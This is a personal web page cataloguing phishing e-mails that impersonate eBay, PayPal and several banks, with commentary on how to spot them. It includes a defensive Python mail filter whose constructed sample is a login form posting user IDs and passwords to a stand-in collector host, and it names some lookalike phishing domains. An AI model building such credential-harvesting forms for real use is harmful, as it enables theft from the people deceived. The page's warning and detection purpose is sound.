Phishing Scam Showcase
Here is a sampling of phishing scam e-mail messages that have made their way into my e-mail inbox. I have decided against posting each and every one I receive since many of them are very similar and I often receive many of them for the more popular targets like eBay and PayPal.
My hope is that someone who has received one of these messages will decide to search the Internet in an attempt to determine if the message is legitimate and may find some of this information and avoid being victimized.
Wells Forgo - No, that's not a typo on my part. These obvious amateur phishermen had a field day with the name "Wells Fargo." First the idiots wrote "Wells Falgo" in the "From:" line of the e-mail and then opened with "Dear Wells Forgo customer." If nothing else, sometimes these things can provide a good laugh.
Armed Forces Bank - Although I have personally never heard of Armed Forces Bank, apparently, these phishermen have.
It's the usual scam with a link that appears to lead to the legitimate bank web site, but actually takes you to a phishing site set up in Taiwan. As of 8:00 a.m. EDT on 8/20/2005, the site was still online, and was, according to an Armed Forces Bank spokesman, shut down very soon after.
To see the original message, click here.
eBay - Here is a very typical eBay phishing e-mail. Once again, their "handy" link where it reads "Click Here" leads to their phony eBay web site where they will capture any login info that is entered.
They add a little pain to the sense of urgency by claiming you would have to pay $350 to reactivate your eBay account. I'm not a big eBay user, so I can't say for certain, but I would be very surprised if that were an actual eBay policy! These phishermen sound a bit desperate!
You can view the original e-mail message, complete with eBay logos, here.
PayPal - Here's a very typical phishing e-mail. Since I have reproduced this message in plain text format, you cannot see all the code they used in the original HTML format message that was sent.
The web link you see below is what appeared in the original message, but what is shown is not the real destination the link will take you to. Despite what the link appears to be, the code behind the link was really pointing to the phishermen's phony web site, which was, of course, set up to capture PayPal login info.
Many e-mail client programs such as Outlook 2003 will display a small pop-up when you hover your mouse over web links that appear within e-mail messages. The pop-up displays the actual web link that may be hidden in the code in an attempt to trick victims into clicking on the link.
Bank of The West - This first one is being rather heavily promoted since I have received no less than six separate copies of this one. These guys are persistent and are presenting a moving target to authorities that are likely trying to track them down by changing the location of their phony site after the first one was shut down.
The first two messages I received have a link to the same web site which was hosted in Korea and has since been shut down. The last four messages I have received have links to the same web site which is hosted in China and is still online as of this writing.
In my experience, most of these phishing scams attempt to lead victims to imposter web sites hosted on servers based in China or Korea.
These guys actually had the gall to copy the "Fraud Alert - What you should know about PHISHING" link from the actual Bank of The West web site to make their site look authentic! How do you like that, a warning about phishing right on the front page of a phishing site!
For fun, I put in some bogus information on the login screen of the phony web site (while sharing a few choice words with them) to see where it led me. It then took me to another screen where it offered to "Renew my eTimeBanker" and asked for a bunch more info, like ATM card number, PIN and e-mail address.
After I fed it some more bogus info, it informed me that "You have renew your eTimeBanker" -- the bad English is often a giveaway. It then forwarded me off to the legitimate Bank of The West web site. How thoughtful of them to save people the trouble of typing it in themselves as they (should be) racing to the genuine Bank of The West web site to change their password as they are dialing the bank on the telephone.
PayPal Verified - This one is a phony PayPal message and encourages the reader to "get verified" by following the link to their PayPal imposter site which has since been shut down.
Also included in the message were images from the genuine PayPal web site to make it look more authentic.
With millions of PayPal accounts out there, there is little doubt that these phishermen bagged their share of unsuspecting victims before their site was located and shut down by authorities.
Bank of The West - Maybe persistence pays off for these maggots. I have never seen a more persistent phishing scam than this one! I have received no less than 20 of these e-mail messages. If it is the same group that is sending all of these, they must be jumping from server to server like crazy in order to keep their phony sites online.
PayPal Account Review Team - Typical PayPal phishing scam. The original message had the official-looking PayPal logo as part of the message and the web address that their link pointed to contained "paypal" as part of the link to make it look more genuine.
eBay Phishing Scam - Here's a typical eBay phishing scam. The writing is not so hot, so that gives a tip-off that it is bogus. They did manage to snag a good domain name for a phishing expedition however. Their links were pointing to a domain with the name e-bay-service-update.com, although I have removed the actual links from the message before posting it here.
"Unusual Activity" PayPal Scam - This is one of the better executed phishing scam messages I have seen lately. It looks quite official and the writing is all quite nicely done. They have the typical authentic-looking link they want you to think will connect you to the PayPal web site, but as usual, the underlying code actually directs you to their phishing web site.
Bank of America Phishing Scam - The latest Bank of America Phishing scam I have received.
eBay Phishing Scam With A Twist - I had not received a phishing scam e-mail message quite like this one before. The mail message was in HTML format, which is not unusual at all, however, they included some code in there to include a very authentic looking eBay login screen right inside the message.
All of the logos and image links have been linked to display from eBay's actual site, but the login screen won't actually allow you to log into eBay. Instead, it collects your User ID and password and then sends them via e-mail to the scam's creator. A pretty clever twist on the usual phishing e-mail message. I guess they're always trying to make things easier for their victims!
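A mail filter can look for the pattern described above: a form inside the message body that asks for a password, with the artwork loaded from one host and the form data sent somewhere else. This is an added example, not code from the original message; the sample body, the image path and `collector.example` are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

class FormAudit(HTMLParser):
    """Record each <form>'s action and password fields, plus image hosts."""
    def __init__(self):
        super().__init__()
        self.forms = []            # one dict per <form> seen
        self.image_hosts = set()   # hosts the message loads images from
        self._open = None          # the form currently being parsed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "img":
            host = urlsplit(a.get("src") or "").hostname
            if host:
                self.image_hosts.add(host.lower())
        elif tag == "form":
            self._open = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            self._open["password"] |= (a.get("type") or "").lower() == "password"

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def credential_forms(html_body):
    """Return (action, scheme, differs) for each form that asks for a password."""
    p = FormAudit()
    p.feed(html_body)
    p.close()
    findings = []
    for form in p.forms:
        if not form["password"]:
            continue
        target = urlsplit(form["action"])
        host = (target.hostname or "").lower()
        # True when images come from one host but the form data goes to another.
        differs = bool(p.image_hosts) and host not in p.image_hosts
        findings.append((form["action"], target.scheme.lower(), differs))
    return findings

# Constructed sample: logo from the real site, form data sent elsewhere.
SAMPLE = (
    '<img src="https://www.ebay.com/logo.gif">'
    '<form action="http://collector.example/formmail.cgi" method="post">'
    '<input type="text" name="userid"><input type="password" name="pass"></form>'
)
```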
eBay Phishing Scam With Bad English - One very quick and easy way to spot some of these scams is the bad English that they often use. You would think that they would put a little extra effort into finding a partner in crime that could help them with their English after all the trouble they have gone through to launch this scam.
University Credit Union - These guys managed to get a domain registered that was pretty close to the actual University Credit Union domain name. They managed to get hold of "update.ucu.edu.tf" which is actually an educational domain reserved for the French Southern Territories, but a quick glance at that might be enough to fool a few victims.
eBay Member Message (From 'cdaniel') Scam - This is a brand-new one, at least for me it is. This one actually had me thinking it might be the real thing for a few moments. It's a clever idea and is no doubt designed to incite a bit of panic on the victim's part. A quick check of the URL this scam is directing victims to reveals that it is not an eBay site at all. Just another phishing site set up to capture eBay usernames and passwords. You can log into the real eBay and check your messages there to confirm that this is indeed just another scam.
Fulton Bank - Very typical bank scam where the crooks are simply trying to get customers of the bank to visit their imposter web site so they can capture their login info.
Colonial Bank - The only difference between this one and the previous one is the name of the bank. Oh yeah, probably different low-life scum that are perpetrating it also.
Shazam Bank - Another bank or financial institution I have never heard of. That does not prevent the phishermen of the Internet Sea from casting their net in my direction however. Do you suppose a die-hard "Gomer Pyle" fan founded that company?
Amcore Bank - Phishermen never seem to run out of ideas to add more urgency to their scam messages in order to incite panic in their intended victims. This is the first time I have personally seen them include data that supposedly identifies the origin of an attempt to access an account. I seriously doubt that any financial institution would include this kind of information in a report of this nature, but these maggots will try anything to scare their victims into action.
Bank of Oklahoma - Run-of-the-mill phishing scam. Nothing special here, but since I don't have anything listed here from Bank of Oklahoma, I will include it.
eBay Fraud Mediation Request - Although this is a pretty typical eBay phishing scam, I thought it deserved a position in the showcase since these phishermen put a lot of effort into making their e-mail message look authentic. They are also using this new tactic that provides identifying information for someone that has supposedly attempted to access your eBay account.
J.P. Morgan Chase - All-too-typical and rather boring phishing scam e-mail. As usual, they try to inject a sense of urgency into their scheme by laying down a deadline that must be met to keep the account open.
Wells Fargo Account Security Measures - Somewhat of a new twist for the phishing scams I usually see. These crooks are trying to get people to believe that Wells Fargo has implemented some new Internet security features and that customers must log in to update their account info.